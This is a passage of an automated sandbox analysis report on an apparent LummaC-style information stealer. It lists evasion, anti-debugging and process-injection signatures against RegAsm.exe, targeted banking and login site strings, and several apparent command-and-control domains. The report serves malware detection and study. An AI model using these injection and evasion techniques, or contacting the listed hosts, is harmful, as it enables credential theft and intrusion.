                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 4820Thread sleep count: 3875 > 30
                            Source: C:\ProgramData\FIEHIIIJDA.exe TID: 1460Thread sleep count: 244 > 30
                            Source: C:\ProgramData\FIEHIIIJDA.exe TID: 6124Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7028Thread sleep time: -30000s >= -30000s
                            Source: C:\ProgramData\JJJEGCGDGH.exe TID: 4548Thread sleep count: 221 > 30
                            Source: C:\ProgramData\JJJEGCGDGH.exe TID: 4092Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\ProgramData\EBAEBFIIEC.exe TID: 3916Thread sleep count: 355 > 30
                            Source: C:\ProgramData\EBAEBFIIEC.exe TID: 5668Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0053FAB6 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,6_2_0053FAB6
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,19_2_0040E430
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,19_2_00414910
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,19_2_0040BE70
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,19_2_004016D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,19_2_0040DA80
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,19_2_00413EA0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,19_2_0040F6B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,19_2_004138B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,19_2_00414570
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,19_2_0040ED20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,19_2_0040DE10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00401160 GetSystemInfo,ExitProcess,19_2_00401160
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\userCGHCGIIDGD.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\userJEHDHIEGII.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeThread delayed: delay time: 922337203685477
                            Source: C:\ProgramData\FIEHIIIJDA.exeThread delayed: delay time: 922337203685477
                            Source: C:\ProgramData\JJJEGCGDGH.exeThread delayed: delay time: 922337203685477
                            Source: C:\ProgramData\EBAEBFIIEC.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppData\Local\Temp\EdgeUpdaterJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeJump to behavior
                            Source: FIDAFCAF.19.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                            Source: FIDAFCAF.19.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                            Source: FIDAFCAF.19.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                            Source: FIDAFCAF.19.drBinary or memory string: discord.comVMware20,11696487552f
                            Source: FIDAFCAF.19.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                            Source: RegAsm.exe, 00000013.00000002.2783474686.000000000147A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware>
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXdD
                            Source: FIDAFCAF.19.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                            Source: RegAsm.exe, 00000006.00000002.2325722695.000000000154A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2325722695.0000000001599000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2783474686.00000000014BD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001680000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.000000000156F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: FIDAFCAF.19.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                            Source: FIDAFCAF.19.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                            Source: FIDAFCAF.19.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                            Source: FIDAFCAF.19.drBinary or memory string: global block list test formVMware20,11696487552
                            Source: FIDAFCAF.19.drBinary or memory string: tasks.office.comVMware20,11696487552o
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+Z
                            Source: FIDAFCAF.19.drBinary or memory string: AMC password management pageVMware20,11696487552
                            Source: LKMService.exe, 00000002.00000002.4652430842.00000000057E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: FIDAFCAF.19.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                            Source: FIDAFCAF.19.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                            Source: FIDAFCAF.19.drBinary or memory string: dev.azure.comVMware20,11696487552j
                            Source: FIDAFCAF.19.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPc !
                            Source: FIDAFCAF.19.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                            Source: GoogleUpdater.exe, 00000028.00000002.4657162160.00000000061DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllttd
                            Source: RegAsm.exe, 00000027.00000002.2588002060.00000000012C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0/0
                            Source: FIDAFCAF.19.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                            Source: FIDAFCAF.19.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                            Source: FIDAFCAF.19.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                            Source: RegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWS
                            Source: FIDAFCAF.19.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                            Source: FIDAFCAF.19.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                            Source: FIDAFCAF.19.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                            Source: FIDAFCAF.19.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                            Source: FIDAFCAF.19.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                            Source: RegAsm.exe, 00000014.00000002.3190699075.000000000161A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                            Source: FIDAFCAF.19.drBinary or memory string: outlook.office.comVMware20,11696487552s
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000156F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWJ
                            Source: FIDAFCAF.19.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                            Source: FIDAFCAF.19.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                            Source: FIDAFCAF.19.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp8M
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: om&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00ajj
                            Source: FIDAFCAF.19.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                            Source: FIDAFCAF.19.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                            Source: RegAsm.exe, 00000023.00000002.3012453273.00000000012C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareJ
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F1398 CheckRemoteDebuggerPresent,2_2_017F1398
                            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess queried: DebugPort
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00552E40 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00552E40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004045C0 VirtualProtect ?,00000004,00000100,0000000019_2_004045C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_00419860
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00432300 mov eax, dword ptr fs:[00000030h]6_2_00432300
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00432300 mov eax, dword ptr fs:[00000030h]6_2_00432300
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00419750 mov eax, dword ptr fs:[00000030h]19_2_00419750
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0050BE90 lstrlenA,GetProcessHeap,HeapAlloc,lstrcpynA,6_2_0050BE90
                            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0053EBD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0053EBD5
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00552E40 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00552E40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0041AD48
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041CEEA SetUnhandledExceptionFilter,19_2_0041CEEA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0041B33A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC2AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_6BC2AC62
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Yara detected Powershell download and execute
                            Source: Yara matchFile source: Process Memory Space: ZNiWLZA4sT3dAjz_lF65fVs6.exe PID: 3468, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: E4aR4O9hOTF5WJfvKNpcVCp8.exe PID: 6812, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6208, type: MEMORYSTR
                            .NET source code references suspicious native API functions
                            Source: 66fbfcc301a31_swws[1].exe.6.dr, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
                            Source: 66fbfcc301a31_swws[1].exe.6.dr, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
                            Source: 66fbfcc301a31_swws[1].exe.6.dr, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
                            Allocates memory in foreign processes
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                            Source: C:\Users\userCGHCGIIDGD.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                            Source: C:\Users\userJEHDHIEGII.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                            Source: C:\ProgramData\FIEHIIIJDA.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                            Source: C:\ProgramData\JJJEGCGDGH.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                            Source: C:\ProgramData\EBAEBFIIEC.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                            Contains functionality to inject code into remote processes
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeCode function: 4_2_02B52205 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,4_2_02B52205
                            Injects a PE file into a foreign processes
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\userCGHCGIIDGD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\userJEHDHIEGII.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                            Source: C:\ProgramData\FIEHIIIJDA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                            Source: C:\ProgramData\JJJEGCGDGH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                            Source: C:\ProgramData\EBAEBFIIEC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                            LummaC encrypted strings found
                            Source: userJEHDHIEGII.exe, 00000020.00000002.2523640982.0000000003D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: absorptioniw.site
                            Source: userJEHDHIEGII.exe, 00000020.00000002.2523640982.0000000003D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: mysterisop.site
                            Source: userJEHDHIEGII.exe, 00000020.00000002.2523640982.0000000003D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: snarlypagowo.site
                            Source: userJEHDHIEGII.exe, 00000020.00000002.2523640982.0000000003D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: treatynreit.site
                            Source: userJEHDHIEGII.exe, 00000020.00000002.2523640982.0000000003D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: chorusarorp.site
                            Source: userJEHDHIEGII.exe, 00000020.00000002.2523640982.0000000003D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: abnomalrkmu.site
                            Source: userJEHDHIEGII.exe, 00000020.00000002.2523640982.0000000003D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: soldiefieop.site
                            Source: userJEHDHIEGII.exe, 00000020.00000002.2523640982.0000000003D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: questionsmw.stor
                            Searches for specific processes (likely to inject)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,19_2_00419600
                            Writes to foreign memory regions
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 56B000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58A000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 592000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 5D8000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1176008Jump to behavior
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 65C000
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 113A008
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
